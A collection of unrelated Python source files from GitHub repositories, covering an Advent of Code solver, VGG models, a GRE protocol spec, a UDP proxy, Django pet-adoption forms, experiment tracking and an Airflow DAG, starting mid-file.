x, y, z\n    return x, y, z\n\n\ndef cubize(x, y, z):\n    return x, y, z\n\ndef volume(x, y, z):\n    return abs((x[1] - x[0] + 1)*(y[1] - y[0] + 1)*(z[1] - z[0] + 1))\n\n\ndef solve_b(commands):\n    cuboids = collections.Counter()\n    for i, cmd in enumerate(commands):\n        overlaps = collections.Counter()\n        for cuboid, sign in cuboids.items():\n            overlap = generate_overlap(cuboid, cmd)\n            if overlap[0][0] <= overlap[0][1] and overlap[1][0] <= overlap[1][1] and overlap[2][0] <= overlap[2][1]:\n                # if volume(overlap[0], overlap[1], overlap[2]) != 0:\n                overlaps[overlap] -= sign\n        cb = cmd[1], cmd[2], cmd[3]\n        if cmd[0] == 'on':\n            cuboids[cb] += 1\n        else:\n            pass\n            # overlaps[cb] -= 1\n        cuboids.update(overlaps)\n\n\n    print(f'Processed cmd {i}, cuboid list size {len(cuboids)}')\n    sum = 0\n    for cuboid, sign in cuboids.items():\n        sum += volume(cuboid[0], cuboid[1], cuboid[2]) * sign\n    return sum\n\n\nif __name__ == '__main__':\n    print(solve_b(get_input()))","repo_name":"jaredblack/advent-of-code-2021","sub_path":"day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38136836472","text":"import torch\nimport torch.nn as nn\n\nfrom models import base_model\n\nclass VGG(base_model.HookModule):\n    def __init__(self, features, device, name, num_classes=1000):\n        super(VGG, self).__init__(device, name)\n        self.features = features\n        self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n        self.classifier = nn.Sequential(\n            nn.Flatten(start_dim=1),\n            nn.Linear(512 * 7 * 7, 4096),\n            nn.ReLU(True),\n            nn.Dropout(),\n            nn.Linear(4096, 4096),\n            nn.ReLU(True),\n            nn.Dropout(),\n            nn.Linear(4096, num_classes),\n        )\n\n    def forward(self, x):\n        x = self.features(x)\n        x = self.avgpool(x)\n        x = self.classifier(x)\n        return x\n\ndef make_layers(cfg, batch_norm=False):\n    layers = []\n    in_channels = 3\n    for v in cfg:\n        if v == 'M':\n            layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n        else:\n            conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)\n            if batch_norm:\n                layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n            else:\n                layers += [conv2d, nn.ReLU(inplace=True)]\n            in_channels = v\n    return nn.Sequential(*layers)\n\n\ncfgs = {\n    'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n    'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],\n    'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],\n}\n\n\ndef _vgg(cfg, batch_norm, device, name):\n    model = VGG(make_layers(cfgs[cfg], batch_norm=batch_norm), device, name)\n    return model\n\n\ndef build_vgg11(device):\n    r\"\"\"VGG 11-layer model (configuration \"A\") from\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('A', False, device, 'vgg11').to(device)\n\n\ndef build_vgg11bn(device):\n    r\"\"\"VGG 11-layer model (configuration \"A\") with batch normalization\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('A', True, device, 'vgg11bn').to(device)\n\n\ndef build_vgg13(device):\n    r\"\"\"VGG 13-layer model (configuration \"B\")\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('B', False, device, 'vgg13').to(device)\n\n\n
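# usage sketch (assumes a CUDA device is available): model = build_vgg16(torch.device('cuda:0'))\n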
def build_vgg13bn(device):\n    r\"\"\"VGG 13-layer model (configuration \"B\") with batch normalization\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('B', True, device, 'vgg13bn').to(device)\n\n\ndef build_vgg16(device):\n    r\"\"\"VGG 16-layer model (configuration \"D\")\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('D', False, device, 'vgg16').to(device)\n\n\ndef build_vgg16bn(device):\n    r\"\"\"VGG 16-layer model (configuration \"D\") with batch normalization\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('D', True, device, 'vgg16bn').to(device)\n\n\ndef build_vgg19(device):\n    r\"\"\"VGG 19-layer model (configuration \"E\")\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('E', False, device, 'vgg19').to(device)\n\n\ndef build_vgg19bn(device):\n    r\"\"\"VGG 19-layer model (configuration \"E\") with batch normalization\n    `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" <https://arxiv.org/abs/1409.1556>`_\n    \"\"\"\n    return _vgg('E', True, device, 'vgg19bn').to(device)\n","repo_name":"qzhong0605/pytorch_lottery","sub_path":"models/imagenet/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40557653548","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport poliglo\n\ndef process(specific_info, data, *args):\n    inputs = poliglo.inputs.get_inputs(data, specific_info)\n    numbers_file = inputs.get('numbers_filepath')\n    with open(numbers_file, 'a') as _file:\n        _file.write(\"%s\\n\" % inputs.get('number'))\n    return [inputs]\n","repo_name":"dperezrada/poliglo","sub_path":"examples/numbers/workers/write_numbers_to_file.py","file_name":"write_numbers_to_file.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"3661398355","text":"from rubik import *\n\nclass GRE_header(header_t):\n    C = bit(1)\n    R = bit(1)\n    K = bit(1)\n    S = bit(1)\n    strict_source_route = bit(1)\n    recursion_control = bit(3)\n    A = bit(1)\n    reserved = bit(4)\n    version = bit(3)\n    protocol = byte(2)\n    payload_length = byte(2)\n    call_ID = bit(16)\n\nclass GRE_sequence_number(header_t):\n    sequence_number = bit(32)\n\nclass GRE_ack_number(header_t):\n    ack_number = bit(32)\n\nclass GRE_perm(header_t):\n    short_PPP = bit(8)\n\ndef gre_layer(ip):\n    gre = connection_oriented()\n    gre.header = seq_parse([GRE_header]) + \\\n        (if_(GRE_header.S) >> seq_parse([GRE_sequence_number])) + \\\n        (if_(GRE_header.A) >> seq_parse([GRE_ack_number]))\n    gre.src_meta = [ip.header[\"src_addr\"]]\n    gre.dst_meta = [ip.header[\"dst_addr\"]]\n\n    gre.perm = auxiliary_data(GRE_perm)\n\n    gre.initializing = set_(gre.perm[\"short_PPP\"], 0)\n\n    state = [\"dump\"]\n\n    gre.psm = psm(state, start_state = \"dump\")\n    gre.psm[\"tunneling_p\"] = from_(\"dump\") + to_(\"dump\") + \\\n        predict_(gre.to_active and \\\n                 gre.header[\"payload_length\"] > 0) + \\\n        set_(gre.SDU, gre.payload) + \\\n        set_(gre.SDU_length, gre.payload_length)\n\n    gre.psm[\"tunneling_a\"] = from_(\"dump\") + to_(\"dump\") + \\\n        predict_(gre.to_passive and \\\n                 gre.header[\"payload_length\"] > 0) + \\\n        set_(gre.SDU, gre.payload) + \\\n        set_(gre.SDU_length, gre.payload_length)\n\n    gre.psm[\"only_ack_p\"] = from_(\"dump\") + to_(\"dump\") + \\\n        predict_(gre.to_active and \\\n                 gre.header[\"payload_length\"] == 0)\n\n    
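# the only_ack transitions fire on zero-length GRE packets, which carry just an acknowledgement and no SDU\n    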
gre.psm[\"only_ack_a\"] = from_(\"dump\") + to_(\"dump\") + \\\n        predict_(gre.to_passive and \\\n                 gre.header[\"payload_length\"] == 0)\n    return gre","repo_name":"GordonWuCn/protocol-independent-network-stack","sub_path":"protocols/GRE.py","file_name":"GRE.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11389001700","text":"import socket\n\nlocalIP = \"140.118.122.155\"\nlocalPort = 5406\n\n# Create a datagram socket\nUDPProxySocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n# Bind to address and ip\nUDPProxySocket.bind((localIP, localPort))\n\nprint(\"UDP Proxy up and listening\")\n\n# Listen for incoming datagrams\nwhile(True):\n    proxyMsg , proxyIP = UDPProxySocket.recvfrom(1024)\n\n    print(\"Message from Client: \",proxyMsg.decode())\n    print(\"Client IP Address: \",proxyIP)\n\n    # Sending a msg to server\n    UDPProxySocket.sendto(proxyMsg, (\"140.118.122.155\", 5405))","repo_name":"hanklin0804/Applications_of_Wireless_Networking_Systems_in_IoT","sub_path":"UDP_socket/hello1_to_hello10000/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8006862008","text":"from turtle import *\r\nimport math\r\n\r\n# Name your Turtle.\r\nt = Turtle()\r\n\r\n# Set Up your screen and starting position.\r\nsetup(500,300)\r\n\r\n### Write your code below:\r\n# begin_fill()/end_fill() take no arguments; set the colour and fill on the same turtle that draws.\r\nt.color('green')\r\nt.begin_fill()\r\nfor b in range(3):\r\n    t.forward(120)\r\n    t.right(120)\r\nt.end_fill()\r\n### code from before: pendown()right(60)forward(100)right(60)forward(100)left(60)forward(100)penup()\r\n# Close window on click.\r\nexitonclick()\r\n","repo_name":"syus9522/syus9522.github.io","sub_path":"draw_shapes_triangle.py","file_name":"draw_shapes_triangle.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28951196560","text":"import os\nimport json\nfrom slc.src.utility import Rule\nfrom slc.src.log_module import log\n\ndef combTables(T1,T2,T1_name,T2_name):\n    merged_table={}\n    for k1 in T1.keys():\n        if(\"drop\" in T1[k1].action or \"stop\" in T1[k1].action):\n            merged_table[k1] = Rule._make([T1[k1].active,int(T1[k1].prio),T1[k1].match,T1[k1].action])\n            continue\n\n        for k2 in T2.keys():\n            log.debug(\" Combining: \\n T1[{}]: {} \\n T2[{}]: {} \".format(k1,T1[k1],k2,T2[k2]))\n            new_match = combMatch(T1[k1].match,T2[k2].match)\n            new_action = combAction(T1[k1].action,T1_name,T2_name,T1_name)\n            #print(k1, k2, new_match, new_action)\n            \"\"\"print(new_match, new_action)\n            for i in range(1000000):\n                a = 1\"\"\" \n            if(new_action == None):\n                continue\n            if(len(new_action) > 0):\n                new_action += \",\"\n            new_action += combAction(T2[k2].action,T1_name,T2_name,T2_name)\n            if new_match is not None and new_action is not None:\n                m_name = k1+\"_\"+k2\n                m_active = []\n                m_active.append(T1[k1].active)\n                m_active.append(',')\n                m_active.append(T2[k2].active)\n                m_prio = int(T1[k1].prio)*int(T2[k2].prio)\n\n                merged_table[m_name]=Rule._make([''.join(m_active),m_prio,new_match,new_action])\n                log.debug(merged_table[m_name])\n\n    comres={}\n\n    for k in merged_table.keys():\n        comres[k] = merged_table[k]._asdict() \n    path=\"slc/data/sahiti_data_fw_idps/\"+str(len(T1)-1)+\"/\"\n    if not os.path.exists(path):\n        os.makedirs(path)\n    json.dump(comres,open(path+T1_name+\"_\"+T2_name,'w'),indent=4)\n    #print(json.dumps(comres,indent=4))\n    return 
merged_table\n\ndef combAction(a1,T1_name,T2_name,curr_name):\n new_action = []\n for act in a1.split(\",\"):\n if \"drop\" in act:\n new_action.append(act)\n new_action.append(',')\n elif \"send\" not in act:\n act_arr = act.split(\"(\")\n if('-' in act_arr[1]):\n new_action.append(act)\n new_action.append(',')\n else:\n new_action.append(act_arr[0])\n new_action.append('('+curr_name+'-')\n new_action.append(act_arr[1])\n new_action.append(',')\n elif \"send\" in act:\n next = act.split(\"(\")[1].split(\")\")[0]\n if(curr_name == T2_name):\n new_action.append(act)\n new_action.append(',')\n elif (next != T2_name):\n return None\n\n if len(new_action) > 0:\n new_action.pop()\n return ''.join(new_action)\n\n\n\ndef combMatch(ma1,ma2):\n m1 = ma1.split(\",\")\n m2 = ma2.split(\",\")\n wildcard = ['*']\n \"\"\"print(ma1,ma2)\n for i in range(1000000):\n a=1\"\"\"\n if (m1 == wildcard):\n if (m2 == wildcard):\n return '*'\n else:\n return ma2\n elif (m2 == wildcard):\n return ma1\n else:\n d1 = m2d(m1)\n d2 = m2d(m2)\n if (checkClash(d1,d2)):\n return None\n else:\n ma = merge_actions(d1,d2)\n return ma\n\n return None\n\ndef checkClash(d1,d2):\n for k1 in d1.keys():\n if k1 in d2:\n if (k1 == \"src\" or k1 == \"dst\" or k1 == \"port\"):\n if(d1[k1] != d2[k1]):\n return True\n return False\n\ndef merge_actions(d1,d2):\n for k in d2.keys():\n if (k == \"src\" or k == \"dst\" or k == \"port\"):\n if k not in d1:\n d1[k] = d2[k]\n ma = []\n for k, v in d1.items():\n if (k == \"src\" or k == \"dst\" or k == \"port\"):\n ma.append(k)\n ma.append(\"=\")\n ma.append(v)\n ma.append(\",\")\n if \"c\" in d1:\n ma.append(d1[\"c\"])\n ma.append(\",\")\n if \"c\" in d2:\n ma.append(d2[\"c\"])\n ma.append(\",\")\n ma.pop() \n return ''.join(ma)\n\n\n\n\ndef m2d(m):\n d = {}\n for item in m:\n if (item.startswith(\"src\") or item.startswith(\"dst\") or item.startswith(\"port\")):\n if(\"=\" in item):\n item_s = item.split(\"=\")\n d[item_s[0]] = item_s[1]\n else:\n d[\"c\"] = item\n return d\n\n\"\"\"\ndef parseC(s):\n item_s = s.split(\"c\")\n res = []\n res.append(parseInt(item_s[0]))\n res.append(parseInt(item_s[1]))\n print(res)\n for i in range(1000000):\n a=1\n return res\n\ndef parseInt(s):\n i = 0\n for c in s:\n if c.isdigit():\n i *= 10\n i += ord(c)-ord('0')\n print(c,i)\n for x in range(1000000):\n a = 1\n return i\n\"\"\"","repo_name":"b-sahiti/safety_liveness_checker","sub_path":"slc/src/combine_tables.py","file_name":"combine_tables.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26309377145","text":"# coding:utf-8\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import get_user_model\nfrom models import Pets,Adopt,Blog,Comment\nfrom django.utils.safestring import mark_safe\n\nclass HorizRadioRenderer(forms.RadioSelect.renderer): #自訂radio選項redner樣式\n \"\"\" this overrides widget method to put radio buttons horizontally\n instead of vertically.\n \"\"\"\n def render(self):\n \"\"\"Outputs radios\"\"\"\n return mark_safe(u'\\n'.join([u'%s\\n' % w for w in self]))\n\n\nclass UserForm(UserCreationForm):\n name = forms.CharField(label='姓名',max_length=20,required=True)\n facebook = forms.CharField(label='Facebook網址',max_length=100,required=True)\n address = forms.CharField(label='地址',max_length=50,required=True)\n mobile = forms.CharField(label='手機號碼',max_length=10,required=True)\n id_card_num = 
forms.CharField(label='身份證字號',max_length=10,required=True)\n line = forms.CharField(label='Line ID(非必填)',max_length=20,required=False)\n home_tel = forms.CharField(label='家電(非必填)',max_length=10,required=False)\n photo = forms.ImageField(label='身份證照')\n class Meta:\n model = get_user_model()\n fields = ('username','name','gender','email','id_card_num','address','mobile','home_tel','facebook','line','profile','photo')\n labels = {\n 'username': '帳號',\n 'email': 'E-mail',\n 'gender': '性別',\n 'profile': '個人自述',\n }\n\nclass User_Edit(forms.ModelForm):\n line = forms.CharField(label='Line ID(非必填)',max_length=20,required=False)\n home_tel = forms.CharField(label='家電(非必填)',max_length=10,required=False)\n class Meta():\n model = get_user_model()\n fields = ('email','profile','mobile','home_tel','facebook','line','profile')\n\n'''class Change_User_State(forms.ModelForm):\n class Meta():\n model = get_user_model()\n fields = ('state',)\n'''\n\nclass LoginForm(forms.Form):\n username = forms.CharField(label='帳號',max_length=255, required=True)\n password = forms.CharField(label='密碼',widget=forms.PasswordInput, required=True)\n\nclass Post_Pet(forms.ModelForm):\n photo = forms.ImageField(label='放張寵物照')\n breed = forms.CharField(label='品種(非必填)',max_length=10,required=False)\n class Meta:\n model = Pets\n fields = ('dog_or_cat','pet_name','sex','age','size','color','breed','area','chip','neuter','content','photo')\n labels = {\n 'dog_or_cat':'狗或貓',\n 'pet_name':'寵物的名字',\n 'sex':'寵物性別',\n 'age':'年紀',\n 'size':'體型',\n 'color':'毛色',\n 'area':'地區',\n 'chip':'晶片有無',\n 'neuter':'有無結紮',\n 'content':'寵物介紹一下',\n }\n widgets = {\n 'dog_or_cat': forms.RadioSelect(renderer=HorizRadioRenderer),\n 'chip': forms.RadioSelect(renderer=HorizRadioRenderer),\n 'neuter': forms.RadioSelect(renderer=HorizRadioRenderer),\n }\n\n\nclass Adopt_Request_Form(forms.ModelForm):\n class Meta:\n model = Adopt\n fields = ('content',)\n\n\nclass Blog_Post(forms.ModelForm):\n photo = forms.ImageField(label='上傳照片')\n class Meta:\n model = Blog\n fields = ('title','content','photo')\n labels = {\n 'title':'標題',\n 'content':'內容',\n }\n\n\nclass Comment_Form(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ('credit','comment',)\n labels = {\n 'credit':'給送養者評價',\n 'comment':'寫下你對對方的評語',\n }\n widgets = {\n 'credit': forms.RadioSelect(renderer=HorizRadioRenderer)\n }","repo_name":"littlesheng19/petadopt","sub_path":"Project/pets_adopt/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73826215892","text":"import os\nfrom PIL import Image\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator\n\n# Image utils\ndef read_image(filename, scale=1):\n img = Image.open(os.path.join(filename))\n if scale != 1:\n w, h = img.size\n img = img.resize((int(w * scale), int(h * scale)), Image.BICUBIC)\n img = np.array(img)\n if len(img.shape) == 3:\n img = img[..., :3]\n return img.astype(np.float64) / 255 # only first 3\n\ndef normalize(img):\n return (img - img.min()) / (img.max() - img.min())\n\ndef circle_region(X, Y, r):\n o_x, o_y = X // 2, Y // 2\n x_grid, y_grid = np.meshgrid(np.arange(X), np.arange(Y))\n circ = (((x_grid - o_x)**2 + (y_grid - o_y)**2) < r**2).astype(np.int)\n return circ\n\n# Plotting\ndef plot_2d(X, Y, Z, title):\n fig, ax = plt.subplots()\n heatmap = ax.imshow(Z[::-1], cmap=cm.coolwarm)\n 
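# Z is drawn as Z[::-1] because imshow places row 0 at the top; the flip keeps y increasing upward as in plot_3d\n    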
ax.set_title(title)\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_xticks([0, len(X) - 1], np.round(np.array([X[0], X[-1]]), 2))\n ax.set_yticks([0, len(Y) - 1], np.round(np.array([Y[-1], Y[0]]), 2))\n fig.colorbar(heatmap, shrink=0.5, aspect=5)\n plt.show()\n\ndef plot_3d(X, Y, Z, title):\n fig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\n\n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n\n # Customize the z axis.\n ax.zaxis.set_major_locator(LinearLocator(10))\n # A StrMethodFormatter is used automatically\n ax.zaxis.set_major_formatter('{x:.02f}')\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n plt.title(title)\n plt.show()\n","repo_name":"bchao1/poissonpy","sub_path":"poissonpy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"67"} +{"seq_id":"7954904664","text":"from typing import Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport gymnasium as gym\nimport hydra\nimport wandb\nfrom omegaconf import DictConfig, OmegaConf\nfrom stable_baselines3.common import logger as sb3logger\nfrom stable_baselines3.common.logger import configure\n\n# from ..utils import ActionFrameStack\n\n\nclass Tracker:\n @classmethod\n def _cfg_merge(cls, experiment_cfg: DictConfig) -> DictConfig:\n # load a default cfg for this task-env combo, in case the config has changed since the experiment was peformed\n hydra.core.global_hydra.GlobalHydra.instance().clear()\n hydra.initialize(version_base=\"1.2\", config_path=\"config\")\n task_name = (\n experiment_cfg.task.name\n if (experiment_cfg.env.name != \"gym\")\n else experiment_cfg.env.task\n )\n cfg = hydra.compose(\n config_name=\"config.yaml\",\n overrides=[\n f\"env={experiment_cfg.env.name}\",\n f\"task={task_name}\",\n ],\n )\n OmegaConf.update(\n cfg, \"frame_stacking\", experiment_cfg.frame_stacking, force_add=True\n )\n OmegaConf.update(cfg, \"env\", experiment_cfg.env, force_add=True)\n OmegaConf.update(cfg, \"task\", experiment_cfg.task, force_add=True)\n return cfg\n\n def experiment_result(self, run_path: str) -> Tuple[gym.Env, str]:\n # load experiment using the API, returns a generated env and path to .onnx model\n raise NotImplementedError\n\n def save_model(self, model_path: str):\n raise NotImplementedError\n\n def save_video(self, video_path: str, num_timesteps: int):\n raise NotImplementedError\n\n def sb3_logger(self) -> sb3logger.Logger:\n raise NotImplementedError\n\n def finish(self):\n raise NotImplementedError\n\n\nclass LocalTracker(Tracker):\n def __init__(self, cfg: DictConfig, output_dir: str):\n self.output_dir = output_dir\n self.cfg = cfg\n # yaml.dump(OmegaConf.to_container(cfg, resolve=True, throw_on_missing=True), self.output_dir)\n\n def sb3_logger(self) -> sb3logger.Logger:\n return configure(self.output_dir, [\"stdout\", \"csv\", \"tensorboard\"])\n\n def save_model(self, model_path: str):\n pass\n\n def save_video(self, video_path: str, num_timesteps: int):\n pass\n\n def finish(self):\n pass\n\n\nclass WandbWriter(sb3logger.KVWriter, sb3logger.SeqWriter):\n def write_sequence(self, sequence: List) -> None:\n \"\"\"\n write_sequence an array to file\n\n :param sequence:\n \"\"\"\n print(sequence)\n\n def write(\n self,\n key_values: Dict[str, Any],\n key_excluded: Dict[str, Union[str, Tuple[str, ...]]],\n step: int = 0,\n ) -> None:\n \"\"\"\n Write a dictionary to 
file\n\n :param key_values:\n :param key_excluded:\n :param step:\n \"\"\"\n # print(key_excluded)\n wandb.log(key_values, step=step)\n\n def close(self) -> None:\n \"\"\"\n Close owned resources\n \"\"\"\n # raise NotImplementedError\n pass\n\n\nclass WandbTracker(Tracker):\n def __init__(self, cfg: DictConfig, output_dir: str) -> None:\n # init the tracking connection\n self.cfg = cfg\n task_name = cfg.task.name if (cfg.env.name != \"gym\") else cfg.env.task\n self.run = wandb.init(\n project=f\"{cfg.env.name}-{task_name}\".replace(\" \", \"_\"),\n name=cfg.name,\n config=OmegaConf.to_container(cfg, resolve=True, throw_on_missing=True),\n # sync_tensorboard=True, # auto-upload sb3's tensorboard metrics\n # monitor_gym=True, # auto-upload the videos of agents playing the game\n group=cfg.group,\n save_code=True, # optional\n dir=output_dir,\n )\n self.output_dir = wandb.run.dir\n\n @classmethod\n def experiment_result(cls, run_path: str) -> Tuple[str, DictConfig]:\n # load experiment using the API, returns a path to .onnx model and the original config\n api = wandb.Api()\n run = api.run(run_path)\n experiment_cfg = OmegaConf.create(run.config)\n cfg = cls._cfg_merge(experiment_cfg)\n model_path = f\"onnx_models/{cfg.env.name}/{cfg.task.name}/{run._attrs['name']}\"\n model_name = \"sk8o_actor.onnx\"\n run.file(model_name).download(root=model_path, exist_ok=True)\n return f\"{model_path}/{model_name}\", cfg\n\n @classmethod\n def best_checkpoint(cls, run_path: str) -> str:\n api = wandb.Api()\n run = api.run(run_path)\n experiment_cfg = OmegaConf.create(run.config)\n cfg = cls._cfg_merge(experiment_cfg)\n model_path = (\n f\"previous_runs/{cfg.env.name}/{cfg.task.name}/{run._attrs['name']}\"\n )\n model_name = \"best_checkpoint.zip\"\n run.file(model_name).download(root=model_path, exist_ok=True)\n return f\"{model_path}/{model_name}\", cfg\n\n def save_model(self, model_path: str):\n wandb.save(model_path)\n\n def save_video(self, video_path: str, num_timesteps: int):\n wandb.log({\"eval_video\": wandb.Video(video_path)}, step=num_timesteps)\n\n def sb3_logger(self) -> sb3logger.Logger:\n writer = WandbWriter()\n return sb3logger.Logger(self.output_dir, output_formats=[writer])\n\n def finish(self):\n return self.run.finish()\n","repo_name":"aa4cc/sk8o-rl","sub_path":"training/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"37717374011","text":"import numpy as np\nimport imageio\n\nfrom skimage.external import tifffile as tif\n\ndef sphere2(shape, radii, position):\n\t\n\tarr = np.zeros(shape, dtype=float)\n\tfor myIdx, radius in enumerate(radii):\n\t\t# assume shape and position are both a 3-tuple of int or float\n\t\t# the units are pixels / voxels (px for short)\n\t\t# radius is a int or float in px\n\t\tsemisizes = (radius,) * 3\n\n\t \t# genereate the grid for the support points\n\t\t# centered at the position indicated by position\n\t\tgrid = [slice(-x0, dim - x0) for x0, dim in zip(position[myIdx], shape)]\n\t\tposition2 = np.ogrid[grid]\n\t\t# calculate the distance of all points from `position` center\n\t\t# scaled by the radius\n\t\t#arr = np.zeros(shape, dtype=float)\n\t\tfor x_i, semisize in zip(position2, semisizes):\n\t\t\tarr += (np.abs(x_i / semisize) ** 2)\n\t\t# the inner part of the sphere will have distance below 1\n\t\n\treturn arr <= 1.0\n\ndef sphere(shape, radius, position):\n\t# assume shape and position are both a 3-tuple 
of int or float\n\t# the units are pixels / voxels (px for short)\n\t# radius is a int or float in px\n\tsemisizes = (radius,) * 3\n\n\t# genereate the grid for the support points\n\t# centered at the position indicated by position\n\tgrid = [slice(-x0, dim - x0) for x0, dim in zip(position, shape)]\n\tposition = np.ogrid[grid]\n\t# calculate the distance of all points from `position` center\n\t# scaled by the radius\n\tarr = np.zeros(shape, dtype=float)\n\tfor x_i, semisize in zip(position, semisizes):\n\t\tarr += (np.abs(x_i / semisize) ** 2)\n\t# the inner part of the sphere will have distance below 1\n\treturn arr <= 1.0\n\narr = sphere((256, 256, 256), 10, (100, 100, 100))\nprint('arr.shape:', arr.shape, type(arr), arr.dtype)\n#intArr = arr.astype('int8')\n\narr2 = sphere((256, 256, 256), 20, (50, 40, 50))\narr3 = sphere((256, 256, 256), 30, (150, 120, 150))\n#intArr2 = arr2.astype('int8')\n\nsaveArr = arr + arr2 + arr3\nsaveArr = saveArr.astype('int8')\nprint('saveArr.shape:', saveArr.shape, type(saveArr), saveArr.dtype)\ntif.imsave('a.tif', saveArr, bigtiff=True)\n\nmyShape = (256,1024,1024)\nmyRadii = [10,20,30,40,50,60]\nmyPositions = [\n\t(50, 40, 50),\n\t(100, 100, 100),\n\t(150, 120, 150),\n\t(100, 300, 300),\n\t(100, 500, 500),\n\t(120, 700, 700),\n\t]\n#myArr = sphere2(myShape, myRadii, myPositions)\nfor idx, radius in enumerate(myRadii):\n\tprint(idx)\n\tarr = sphere(myShape, myRadii[idx], myPositions[idx])\n\tif idx==0:\n\t\tsaveArr = arr\n\telse:\n\t\tsaveArr += arr\nmyArr = saveArr.astype('int8')\n\t\t\nprint('myArr.shape:', myArr.shape, type(myArr), myArr.dtype)\ntif.imsave('b.tif', myArr, bigtiff=True)\n\n#imageio.imwrite('sphere.tif', intArr)\n# this will save a sphere in a boolean array\n# the shape of the containing array is: (256, 256, 256)\n# the position of the center is: (127, 127, 127)\n# if you want is 0 and 1 just use .astype(int)\n# for plotting it is likely that you want that\n\n# just for fun you can check that the volume is matching what expected\nmySum = np.sum(arr)\n# gives: 4169\nprint('mySum:', mySum)\n\nmySum2 = 4 / 3 * np.pi * 10 ** 3\nprint('mySum2:', mySum2)\n# gives: 4188.790204786391\n# (the two numbers do not match exactly because of the discretization error)\n","repo_name":"cudmore/bImPy","sub_path":"sandbox/bSpere.py","file_name":"bSpere.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"28804661640","text":"import requests\n\nfrom datetime import timedelta, datetime\n\nfrom airflow import DAG\nfrom airflow.decorators import task\nfrom airflow.operators.subdag import SubDagOperator\n\nfrom dags.sub_dag.child_dag import subdag_factory\n\ndefault_args = {\"start_date\": datetime(2022, 1, 7)}\n\n\n@task.python(multiple_outputs=True)\ndef get_response():\n return requests.get('https://jsonplaceholder.typicode.com/todos/1').json()\n\n\n@task.python\ndef read_file():\n with open(file='file.csv', mode='r') as f:\n for line in f.readlines():\n print(line)\n\n\nwith DAG(dag_id=\"main\", description=\"Main Dag - SubDag example\", dagrun_timeout=timedelta(minutes=10),\n default_args=default_args) as dag:\n\n transform = SubDagOperator(\n task_id=\"process\",\n subdag=subdag_factory(parent_dag_id=\"main\", subdag_dag_id=\"process\", default_args=default_args),\n poke_interval=3\n )\n\n get_response() >> transform >> 
